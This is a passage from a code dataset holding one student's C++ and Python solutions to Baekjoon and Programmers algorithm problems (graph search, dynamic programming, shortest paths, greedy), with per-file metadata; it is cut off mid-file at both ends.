"f4a6b0a89f53317d1cb09fbcd9c4b7bb49aad792", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 470, "license_type": "no_license", "max_line_length": 58, "num_lines": 30, "path": "/BOJ/Prefix Sum/2559.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2559번: 수열\nDATE: 2022-01-23\nPrefix Sum\n*/\n#include <iostream>\n#include <queue>\nusing 
namespace std;\n\nint arr[100001];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n priority_queue<int> pq;\n int n, k;\n \n cin >> n >> k;\n\n for(int i = 1 ; i <= n ; i++) {\n cin >> arr[i];\n arr[i] += arr[i - 1];\n\n if(i < k) continue;\n pq.push(arr[i] - arr[i - k]);\n }\n\n cout << pq.top();\n\n return 0;\n}" }, { "alpha_fraction": 0.5682656764984131, "alphanum_fraction": 0.6125461459159851, "avg_line_length": 19.923076629638672, "blob_id": "564b46a481f9ec394c5c93448434622992d536c3", "content_id": "e6920be339292aa8186baa78a5d32e0c5df3322c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 289, "license_type": "no_license", "max_line_length": 58, "num_lines": 13, "path": "/programmers/Level 1/calculate_the_shortfall.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 1: 부족한 금액 계산하기\ndate: 2022-03-27\n*/\nusing namespace std;\n\nlong long solution(int price, int money, int count)\n{\n long long answer = 0;\n for(int i = 1 ; i <= count ; i++) answer += price * i;\n \n return answer > money ? answer - money : 0;\n}" }, { "alpha_fraction": 0.49501660466194153, "alphanum_fraction": 0.5315614342689514, "avg_line_length": 20.023256301879883, "blob_id": "e44bfec946ae96809c669eacf1867c8422db5882", "content_id": "15c3827bb942147ca017b775b6fa08ee50e84e4a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 963, "license_type": "no_license", "max_line_length": 73, "num_lines": 43, "path": "/BOJ/Binary Search/14002.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 14002번: 가장 긴 증가하는 부분 수열 4\nDATE: 2022-01-06\nUPDATE: 2022-02-21\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nvector<int> input, lis, index;\n\nvoid backtrace(int idx, int num){\n if(idx == -1) return;\n if(index[idx] == num){\n backtrace(idx - 1, num - 1);\n cout << input[idx] << \" \";\n }\n else backtrace(idx - 1, num);\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, num;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++) {\n cin >> num;\n\n int idx = lower_bound(lis.begin(), lis.end(), num) - lis.begin();\n\n if(lis.empty() || num > lis.back()) lis.push_back(num);\n else lis[idx] = num;\n\n input.push_back(num);\n index.push_back(idx); //i번째 원소가 lis 내에서 위치하는 인덱스를 저장\n }\n \n cout << lis.size() << '\\n';\n backtrace(n - 1, lis.size() - 1); \n\n return 0;\n}" }, { "alpha_fraction": 0.5167464017868042, "alphanum_fraction": 0.5693780183792114, "avg_line_length": 22.33333396911621, "blob_id": "0095d470c6ec86b9769bff40b71603e099faf1e9", "content_id": "9cd3de40cc4270933af463193120dbe6ae8acf7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 215, "license_type": "no_license", "max_line_length": 54, "num_lines": 9, "path": "/programmers/Level 1/kth_number.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# programmers Level 1: K번째수\n# date: 2022-04-14\ndef solution(array, commands):\n answer = []\n \n for i, j, k in commands:\n answer.append(sorted(array[i - 1 : j])[k - 1])\n \n return answer" }, { "alpha_fraction": 0.44225722551345825, "alphanum_fraction": 0.4881889820098877, "avg_line_length": 16.340909957885742, "blob_id": "9fd7b666aafb4dc3918f3bd7ff9f79f6bdc3592c", "content_id": "50ac8d7895d40a8bac935f2126ad34c419585c64", "detected_licenses": [], "is_generated": false, "is_vendor": 
false, "language": "C++", "length_bytes": 824, "license_type": "no_license", "max_line_length": 58, "num_lines": 44, "path": "/BOJ/Greedy/13305.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 13305번: 주유소\nDATE: 2021-01-06\n*/\n#include <iostream>\nusing namespace std;\nlong long rate[100001], dst[100000];\n\nint main() {\n\tint check = 0; //계산할 주유소\n\tlong long n, mid_dst, sum_rate = 0;\n\n\tcin >> n;\n\n\tfor (int i = 0; i < n-1; i++) \n\t\tcin >> dst[i];\n\tfor (int i = 0; i < n; i++)\n\t\tcin >> rate[i];\n\n\twhile (1) {\n\t\tmid_dst = 0; //거리 갱신\n\n\t\tfor (int i = check; i < n - 1; i++) { \n\t\t\tif (rate[i] < rate[check]) { //현재 도시보다 가격이 싼 주유소가 있을 때 \n\t\t\t\tfor (int j = check; j < i; j++) \n\t\t\t\t\tmid_dst += dst[j];\n\t\t\t\t\n\t\t\t\tsum_rate += rate[check] * mid_dst;\n\t\t\t\tcheck = i;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\telse if(i == n-2){\n\t\t\t\tfor (int j = check; j <= i; j++)\n\t\t\t\t\tmid_dst += dst[j];\n\t\t\t\n\t\t\t\tsum_rate += rate[check] * mid_dst;\n\t\t\t\tcout << sum_rate << endl;\n\n\t\t\t\treturn 0;\n\t\t\t}\n\t\t}\n\n\t}\n}" }, { "alpha_fraction": 0.4728132486343384, "alphanum_fraction": 0.513002336025238, "avg_line_length": 15.960000038146973, "blob_id": "75c45da5598a2db0b48e20dacb7e190a13116dbb", "content_id": "fe2e2051c4e3c9bfabe5018f0f2731b89723b0ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 433, "license_type": "no_license", "max_line_length": 59, "num_lines": 25, "path": "/BOJ/Implementation/2075.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2075번: N번째 큰 수\nDATE: 2022-01-30\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n priority_queue<int, vector<int>, greater<int>> pq;\n int n, num;\n cin >> n;\n\n for(int i = 0 ; i < n * n ; i++) {\n cin >> num;\n pq.push(num);\n\n if(pq.size() > n) pq.pop();\n }\n\n cout << pq.top();\n\n return 0;\n}" }, { "alpha_fraction": 0.3746640980243683, "alphanum_fraction": 0.39731284976005554, "avg_line_length": 25.059999465942383, "blob_id": "6f4b1ef6925bf7e8ec59fae81e765a93d2a8ab3e", "content_id": "2f774e6f283c9f1194136c14be3e352463fcf20f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2761, "license_type": "no_license", "max_line_length": 139, "num_lines": 100, "path": "/BOJ/BFS_DFS/3055.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 3055번: 탈출\nDATE: 2021-10-12\nBFS\n*/\n#include <iostream>\n#include <queue>\n#include <vector>\nusing namespace std;\n\nint dx[4] = {-1, 0, 1, 0};\nint dy[4] = {0, 1, 0, -1};\nint r, c;\nint d_x, d_y, s_x, s_y;\nvector <pair<int, int>> water;\nqueue<pair<int, int>> s, w;\nchar forest[51][51];\nint s_visited[51][51] = {0, }, w_visited[51][51] = {0, };\n\nvoid bfs() {\n for(int i = 0 ; i < water.size() ; i++) {\n w.push(make_pair(water[i].first, water[i].second));\n w_visited[water[i].first][water[i].second] = 1;\n }\n\n s.push(make_pair(s_x, s_y));\n s_visited[s_x][s_y] = 1;\n\n //종료 조건\n // 1. 고슴도치가 비버의 굴에 도착한 경우 => 거리 출력하고 끝\n // 2. 
고슴도치가 더 이상 탐색을 할 수 없는 경우 => KAKTUS 출력하고 끝\n while(!s.empty()) {\n // 물 먼저 이동 (예상 경로)\n int w_size = w.size();\n\n for(int i = 0 ; i < w_size ; i++) {\n pair<int, int> cur = w.front();\n w.pop();\n\n for(int j = 0 ; j < 4 ; j++) {\n int nx = dx[j] + cur.first;\n int ny = dy[j] + cur.second;\n\n if(nx < 0 || ny < 0 || nx >= r || ny >= c || forest[nx][ny] == 'X' || forest[nx][ny] == 'D' || w_visited[nx][ny]) continue;\n w.push(make_pair(nx, ny));\n w_visited[nx][ny] = 1; \n }\n }\n\n //고슴도치 이동\n int s_size = s.size();\n\n for(int i = 0 ; i < s_size ; i++) {\n pair<int, int> cur = s.front();\n s.pop();\n\n for(int j = 0 ; j < 4 ; j++) {\n int nx = dx[j] + cur.first;\n int ny = dy[j] + cur.second;\n\n if(nx < 0 || ny < 0 || nx >= r || ny >= c || forest[nx][ny] == 'X' || w_visited[nx][ny] || s_visited[nx][ny]) continue;\n if(forest[nx][ny] == 'D') { // 목적지 도착\n cout << s_visited[cur.first][cur.second];\n return;\n }\n\n s.push(make_pair(nx, ny));\n s_visited[nx][ny] = s_visited[cur.first][cur.second] + 1; \n }\n }\n }\n\n cout << \"KAKTUS\";\n return;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n cin >> r >> c;\n\n for(int i = 0 ; i < r ; i++) {\n for(int j = 0 ; j < c ; j++) {\n cin >> forest[i][j];\n\n if(forest[i][j] == '*') water.push_back(make_pair(i, j)); // 물\n else if(forest[i][j] == 'D') { // 비버\n d_x = i;\n d_y = j;\n }\n else if(forest[i][j] == 'S') { // 고슴도치\n s_x = i;\n s_y = j;\n }\n }\n }\n\n bfs();\n\n return 0;\n}" }, { "alpha_fraction": 0.40682414174079895, "alphanum_fraction": 0.4593175947666168, "avg_line_length": 18.564102172851562, "blob_id": "efe3bd0bbdc7f8a942a32b71db60f8a13afa5f9a", "content_id": "d6e8ae052d994b2db2db7899e9d241f4a1ef4558", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 770, "license_type": "no_license", "max_line_length": 58, "num_lines": 39, "path": "/BOJ/Dynamic Programming/13398.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "WINDOWS-1256", "text": "/*\nBOJ 13398¹ّ: ؟¬¼ساص 2\nDATE: 2021-07-20 \n*/\n#include <iostream>\n#include <algorithm>\n#define MAX 100001\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int arr[MAX], left[MAX], right[MAX];\n int n, ans;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n cin >> arr[i];\n }\n\n ans = left[0] = arr[0];\n right[n - 1] = arr[n - 1];\n\n for(int i = 1 ; i < n ; i++){\n left[i] = max(arr[i], arr[i] + left[i-1]);\n ans = max(ans, left[i]);\n }\n\n for(int i = n - 2 ; i >= 0 ; i--){\n right[i] = max(arr[i], arr[i] + right[i + 1]);\n }\n\n for(int del = 1 ; del < n - 1 ; del++){\n ans = max(ans, left[del - 1] + right[del + 1]); \n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4465753436088562, "alphanum_fraction": 0.465753436088562, "avg_line_length": 21.4769229888916, "blob_id": "1bc20b7d7b2ea6934968c332034051812f58e736", "content_id": "8eb7197fbb3f1fb6e8329c53fe150122d9815c37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1460, "license_type": "no_license", "max_line_length": 62, "num_lines": 65, "path": "/programmers/Level 3/jewelry_shopping.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 3 : Jewelry shopping\n//2020 KAKAO Internship\n//2021-05-02\n#include <string>\n#include <vector>\n#include <map>\n#include <set>\n#include <algorithm>\n#include <iostream>\nusing namespace std;\n\nvector<int> solution(vector<string> gems) {\n vector<int> 
answer;\n vector<string> list; \n map<string, int> m;\n set<string> s;\n int n, min=100001, ans_start=0, ans_end=0, start=0, end=0;\n \n list = gems;\n sort(list.begin(), list.end());\n list.erase(unique(list.begin(), list.end()), list.end());\n n = list.size();\n \n while(true){\n if(s.size() == n){\n int dst = end - start;\n \n if(dst < min){\n min = dst;\n ans_start = start + 1;\n ans_end = end;\n }\n \n m[gems[start]]--;\n start++;\n \n if(m[gems[start - 1]] == 0){\n s.erase(gems[start - 1]);\n }\n }\n else if(end == gems.size()){\n break;\n }\n else if(s.size() < n){\n s.insert(gems[end]);\n m[gems[end]]++;\n end++;\n }\n }\n \n answer.push_back(ans_start);\n answer.push_back(ans_end);\n \n return answer;\n}\n\nint main(){\n vector<string> gems = {\"DIA\",\"EM\",\"EM\",\"RUB\",\"DIA\"};\n vector<int> answer;\n\n answer = solution(gems);\n\n for(int i = 0 ; i < answer.size() ; i++)\n cout << answer[i] << \" \";\n}" }, { "alpha_fraction": 0.409431129693985, "alphanum_fraction": 0.42514970898628235, "avg_line_length": 20.22222137451172, "blob_id": "8b44c90ae6e6e2799c52ea45eb896cb6744c9dd8", "content_id": "135a46bd87ce37b42faa64016a4804502de54869", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1404, "license_type": "no_license", "max_line_length": 73, "num_lines": 63, "path": "/programmers/Level 2/bracket_transformation.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 괄호 변환\ndate: 2022-04-29\n*/\n#include <string>\n#include <stack>\nusing namespace std;\n\nint isBalanced(string str){ // 균형잡힌 괄호 문자열\n int left = 0, right = 0, ret = -1;\n \n for(int i = 0 ; i < str.length() ; i++){\n if(str[i] == '(') left++;\n else right++;\n \n if(left == right) return i;\n }\n}\n\nbool isCorrect(string str){ // 올바른 괄호 문자열\n stack<char> s;\n \n for(int i = 0 ; i < str.length() ; i++) {\n if(s.empty() || str[i] == '(') s.push(str[i]);\n else if(s.top() == '(') s.pop();\n }\n\n if(!s.empty()) return false;\n else return true;\n}\n\nstring solution(string p) {\n string answer = \"\";\n \n if(p == \"\") return answer;\n if(isBalanced(p) != -1 && isCorrect(p)) return p;\n \n while(1){\n int idx = isBalanced(p);\n \n string u = p.substr(0, idx + 1);\n string v = p.substr(idx + 1);\n \n if(isCorrect(u)){\n answer += u;\n p = v;\n continue;\n }\n \n string tmp = \"(\";\n tmp += solution(v) + \")\";\n \n for(int i = 1 ; i < u.length() - 1 ; i++){ // u의 첫 번째와 마지막 문제는 제외\n if(u[i] == '(') tmp += \")\";\n else tmp += \"(\";\n }\n \n answer += tmp;\n break;\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.3757225573062897, "alphanum_fraction": 0.4084778428077698, "avg_line_length": 19.780000686645508, "blob_id": "c2110777b74f105714bdb42a0a1be942b01664b2", "content_id": "eac9909abc770a16b9d282a6b3777387a27be5cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1072, "license_type": "no_license", "max_line_length": 58, "num_lines": 50, "path": "/BOJ/Graph Theory/1238_1.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1238번: 파티\nDATE: 2021-07-12\nFloyd Warshall Algorithm\n*/\n#include <iostream>\n#include <algorithm>\n#define MAX 1000\n#define INF 1e9\nusing namespace std;\n\nint arr[MAX][MAX];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m, x, start, end, t, maximum=-1;\n cin >> n >> m >> x;\n\n for(int i = 0 ; i < n ; i++){\n for(int j = 0 ; j < n ; j++){\n if(i != j) arr[i][j] = INF;\n 
}\n }\n\n for(int i = 0 ; i < m ; i++){\n cin >> start >> end >> t;\n arr[start-1][end-1] = t;\n }\n\n for(int k = 0 ; k < n ; k++){ //거쳐가는 노드\n for(int i = 0 ; i < n ; i++){ //출발 노드\n for(int j = 0 ; j < n ; j++){ //도착 노드\n if(arr[i][k] + arr[k][j] < arr[i][j]){\n arr[i][j] = arr[i][k] + arr[k][j];\n }\n } \n }\n }\n \n int ans[n];\n\n for(int i = 0 ; i < n ; i++){\n ans[i] = arr[i][x-1] + arr[x-1][i];\n maximum = max(ans[i], maximum);\n }\n\n cout << maximum;\n\n return 0;\n}" }, { "alpha_fraction": 0.28817734122276306, "alphanum_fraction": 0.31921181082725525, "avg_line_length": 22.34482765197754, "blob_id": "a602f2502de27193c5c8cde077a9b76acb0bafcb", "content_id": "b23d6d557c7ec250a748de656594f20285aae687", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2060, "license_type": "no_license", "max_line_length": 63, "num_lines": 87, "path": "/BOJ/Implementation/14499.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 14499번: 주사위 굴리기\nDATE: 2021-07-02\n*/\n#include <iostream>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int dice[6] = {0,};\n int n, m, x, y, k, move, bottom=4, right = 1, front=3, tmp;\n cin >> n >> m >> x >> y >> k;\n\n int map[n][m];\n\n for(int i = 0 ; i < n ; i++){\n for(int j = 0 ; j < m ; j++){\n cin >> map[i][j];\n }\n }\n\n for(int i = 0 ; i < k ; i++){\n cin >> move;\n\n if(move == 1){ //동쪽\n y += 1;\n if(x < 0 || x >= n || y < 0 || y >= m){\n y--;\n continue;\n }\n \n tmp = bottom;\n bottom = right;\n if(tmp % 2 == 0) right = tmp +1;\n else right = tmp - 1;\n }\n else if(move == 2){ //서쪽\n y -= 1;\n if(x < 0 || x >= n || y < 0 || y >= m){\n y++;\n continue;\n }\n\n tmp = bottom;\n if(right % 2 == 0) bottom = right+1;\n else bottom = right-1;\n right = tmp;\n }\n else if(move == 3){ //북쪽\n x -= 1;\n if(x < 0 || x >= n || y < 0 || y >= m){\n x++;\n continue;\n }\n\n tmp = bottom;\n if(front % 2 == 0) bottom = front+1;\n else bottom = front - 1;\n front = tmp;\n }\n else if(move == 4){ //남쪽\n x += 1;\n if(x < 0 || x >= n || y < 0 || y >= m){\n x--;\n continue;\n }\n\n tmp = bottom;\n bottom = front;\n if(tmp % 2 == 0) front = tmp + 1;\n else front = tmp - 1;\n }\n\n if(map[x][y] == 0){\n map[x][y] = dice[bottom];\n }\n else{\n dice[bottom] = map[x][y];\n map[x][y] = 0;\n }\n \n if(bottom % 2 == 0) cout << dice[bottom+1] << '\\n';\n else cout << dice[bottom-1] << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3365384638309479, "alphanum_fraction": 0.372863233089447, "avg_line_length": 18.93617057800293, "blob_id": "b67149b6edefec2397d192faca8e015f289cfdd2", "content_id": "7197c254335751f11d1540d9fc9e1f3394bbc0da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 942, "license_type": "no_license", "max_line_length": 68, "num_lines": 47, "path": "/BOJ/Graph Theory/10159.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 10159번: 저울\nDATE: 2022-03-06\nFloyd-Warshall Algorithm\n*/\n#include <iostream>\n#define MAX 101\n#define INF 1e9\nusing namespace std;\n\nint arr[MAX][MAX];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m;\n int a, b, cnt = 0;\n cin >> n >> m;\n\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= n ; j++){\n if(i != j) arr[i][j] = INF; \n }\n }\n\n for(int i = 0 ; i < m ; i++){\n cin >> a >> b;\n arr[a][b] = 1;\n }\n\n for(int k = 1 ; k <= n ; k++){\n for(int i = 1 ; i <= n ; i++){\n for(int j 
= 1 ; j <= n ; j++){\n if(arr[i][k] + arr[k][j] < arr[i][j]) arr[i][j] = 1;\n }\n }\n }\n\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= n ; j++){\n if(arr[i][j] == INF && arr[j][i] == INF) cnt++;\n }\n cout << cnt << '\\n';\n cnt = 0;\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.5013774037361145, "alphanum_fraction": 0.5247933864593506, "avg_line_length": 18.904109954833984, "blob_id": "35dfb5c45f26acef53923aa1da33cc2dbbc00e24", "content_id": "c65c762d40eb6d8e440796a1e83b0c98c476dc75", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1462, "license_type": "no_license", "max_line_length": 63, "num_lines": 73, "path": "/BOJ/MST/1939.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1939번: 중량제한\n2022-01-03\nKruskal Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#include <queue>\n#define MAX 10001\n#define INF 1000000000\nusing namespace std;\n\nvector<pair<int, pair<int,int>>> edge;\nint parent[MAX];\n\nint getParent(int x) {\n if(parent[x] == x) return x;\n return parent[x] = getParent(parent[x]);\n}\n\nvoid unionParent(int a, int b) {\n a = getParent(a);\n b = getParent(b);\n\n if(a < b) parent[b] = a;\n else parent[a] = b;\n}\n\nint findParent(int a, int b){\n a = getParent(a);\n b = getParent(b);\n\n if(a == b) return true;\n else return false;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n vector<int> weight;\n int n, m;\n int a, b, c;\n int start, end;\n cin >> n >> m;\n\n for(int i = 1 ; i <= n ; i++) parent[i] = i;\n\n for(int i = 0 ; i < m ; i++) {\n cin >> a >> b >> c;\n edge.push_back({c, {a, b}}); \n edge.push_back({c, {b, a}});\n }\n\n cin >> start >> end;\n sort(edge.begin(), edge.end(), greater<>());\n\n for(int i = 0 ; i < edge.size() ; i++) {\n int a = edge[i].second.first;\n int b = edge[i].second.second;\n int c = edge[i].first;\n\n if(findParent(a, b)) continue;\n unionParent(a, b);\n weight.push_back(c);\n\n if(findParent(start, end)) {\n cout << *min_element(weight.begin(), weight.end());\n break;\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.45552146434783936, "alphanum_fraction": 0.5168711543083191, "avg_line_length": 12.893616676330566, "blob_id": "adf63edbab17c58b4f33ceeedb1d3c16c5c9541d", "content_id": "2bab898e8c357b923e91f72c2ffc16f4d7433e02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 662, "license_type": "no_license", "max_line_length": 55, "num_lines": 47, "path": "/BOJ/BFS_DFS/2606.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 2606번: 바이러스\nDATE: 2021-01-18\nBFS\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\nint arr[101][101]; \nint visit[101];\nint ans=0, n, m;\n\nvoid bfs(int num) {\n\tqueue <int> q;\n\tvisit[num] = 1;\n\n\tq.push(num);\n\twhile (!q.empty()) {\n\t\tint front = q.front();\n\t\tq.pop();\n\n\t\tfor (int i = 1 ; i <= n; i++) {\n\t\t\tif (arr[front][i] && !visit[i]) {\n\t\t\t\tq.push(i);\n\t\t\t\tvisit[i] = 1;\n\t\t\t\tans++;\n\t\t\t}\n\t\t}\n\t}\n}\n\nint main() {\n\tios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\tcin >> n >> m;\n\n\tfor (int i = 0; i < m; i++) {\n\t\tint num1, num2;\n\t\tcin >> num1 >> num2;\n\t\tarr[num1][num2] = arr[num2][num1] = 1;\n\t}\n\n\tbfs(1);\n\n\tcout << ans;\n\n\treturn 0;\n}" }, { "alpha_fraction": 0.45670628547668457, "alphanum_fraction": 0.4821731746196747, "avg_line_length": 18.032258987426758, "blob_id": 
"b8d31e22da1ae0592ef953ff85a902d3f290c119", "content_id": "d3f3f5de3c77ac897eaf2ade2b3985996674e880", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 623, "license_type": "no_license", "max_line_length": 88, "num_lines": 31, "path": "/programmers/Level 2/more_spicy.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 더 맵게\ndate: 2022-02-23\n-\n새로운 초기화 방법을 알게 되었다..! (line 12)\n*/\n#include <vector>\n#include <queue>\nusing namespace std;\n\nint solution(vector<int> scoville, int K) {\n priority_queue<int, vector<int>, greater<int>> pq(scoville.begin(), scoville.end());\n int answer = 0;\n \n while(pq.top() < K){\n if(pq.size() == 1){\n answer = -1;\n break;\n }\n \n int a = pq.top(); \n pq.pop();\n int b = pq.top();\n pq.pop();\n \n pq.push(a + b * 2);\n answer++;\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.42402827739715576, "alphanum_fraction": 0.4478798508644104, "avg_line_length": 21.215686798095703, "blob_id": "410448911df956b6a5b3550e0d903c27434d3c9a", "content_id": "952f66f167b94378e6ab75cc1ce8c588e74b1152", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1142, "license_type": "no_license", "max_line_length": 53, "num_lines": 51, "path": "/programmers/Level 3/the_farthest_node.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 3: 가장 먼 노드\n2022-02-22\nBFS\n*/\n#include <vector>\n#include <algorithm>\n#include <queue>\nusing namespace std;\n\nint solution(int n, vector<vector<int>> edge) {\n vector<int> graph[n + 1];\n vector<bool> visited(n + 1, false);\n vector<int> d(n + 1, 0);\n queue<int> q;\n int answer = 0;\n \n for(int i = 0 ; i < edge.size() ; i++) {\n graph[edge[i][0]].push_back(edge[i][1]);\n graph[edge[i][1]].push_back(edge[i][0]);\n }\n \n q.push(1);\n d[1] = 0;\n visited[1] = true;\n \n while(!q.empty()){\n int cur = q.front();\n q.pop();\n \n for(int i = 0 ; i < graph[cur].size() ; i++){\n if(!visited[graph[cur][i]]) {\n int nextNode = graph[cur][i];\n int nextDistance = d[cur] + 1;\n \n d[nextNode] = nextDistance;\n visited[nextNode] = true;\n q.push(nextNode);\n }\n }\n }\n \n sort(d.begin(), d.end(), greater<>());\n \n for(int i = 0 ; i <= n ; i++){\n if(d[i] != d[0]) break;\n answer++;\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.41582491993904114, "alphanum_fraction": 0.4680134654045105, "avg_line_length": 16, "blob_id": "63606d6b919a36ed921e4b868bee1970534cb96a", "content_id": "6c524fa98e7e5fe456f59d5be07810ab3cbdb34d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 608, "license_type": "no_license", "max_line_length": 59, "num_lines": 35, "path": "/BOJ/Implementation/15565.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 15565번: 귀여운 라이언\nDATE: 2022-02-01\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n vector<int> vec;\n int n, k, num;\n int ans = 1000001;\n\n cin >> n >> k;\n\n for(int i = 0 ; i < n ; i++) {\n cin >> num;\n if(num == 1) vec.push_back(i);\n }\n\n if(vec.size() < k) {\n cout << -1;\n return 0;\n }\n\n for(int i = 0 ; i <= vec.size() - k ; i++) {\n ans = min(ans, vec[i + k - 1] - vec[i] + 1);\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.41701245307922363, "alphanum_fraction": 0.4730290472507477, "avg_line_length": 
15.655172348022461, "blob_id": "f0e199f3633498df26ba48e4a22a9dbe1d1bd1e1", "content_id": "5460d131de2e0cf350ea5b7409048c5f15089c5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 494, "license_type": "no_license", "max_line_length": 58, "num_lines": 29, "path": "/BOJ/Dynamic Programming/9461.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 9461번: 파도반 수열\nDATE: 2021-05-28\nDynamic programming\n*/\n#include <iostream>\n#define MAX 101\nusing namespace std;\nlong long dp[MAX];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int tc;\n cin >> tc;\n\n dp[1] = dp[2] = dp[3] = 1;\n\n for(int i = 4 ; i < MAX ; i++){\n dp[i] = dp[i - 2] + dp[i - 3];\n }\n\n for(int i = 0 ; i < tc ; i++){\n int num;\n cin >> num;\n cout << dp[num] << '\\n';\n }\n \n return 0;\n}" }, { "alpha_fraction": 0.42935678362846375, "alphanum_fraction": 0.44310060143470764, "avg_line_length": 22.636363983154297, "blob_id": "be1b981790c5224ffc9a152c08994a9a24676b68", "content_id": "a0b77c5aa3559f638f40052a83678aa024380d46", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1819, "license_type": "no_license", "max_line_length": 77, "num_lines": 77, "path": "/programmers/Level 3/bad_user.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 3 : Bad user\n//2019 KAKAO Winter Internship\n//2021-05-08\n#include <string>\n#include <vector>\n#include <set>\n#include <iostream>\n#include <algorithm>\nusing namespace std;\nvector<vector<int>> v;\nset<set<int>> s;\n\nvoid dfs(int depth, vector<int> list){\n if(depth == v.size()){\n set<int> tmp;\n for(int i = 0 ; i < list.size() ; i++){\n tmp.insert(list[i]);\n }\n s.insert(tmp);\n return ;\n }\n\n for(int i = 0 ; i < v[depth].size() ; i++){\n auto it = find(list.begin(), list.end(), v[depth][i]);\n if(it != list.end()){\n continue;\n }\n list.push_back(v[depth][i]);\n dfs(depth + 1, list);\n list.pop_back();\n }\n}\n\nint solution(vector<string> user_id, vector<string> banned_id) {\n int answer = 0;\n vector<int> tmp;\n bool flag;\n \n for(int i = 0 ; i < banned_id.size() ; i++){\n for(int j = 0 ; j < user_id.size() ; j++){\n if(user_id[j].length() != 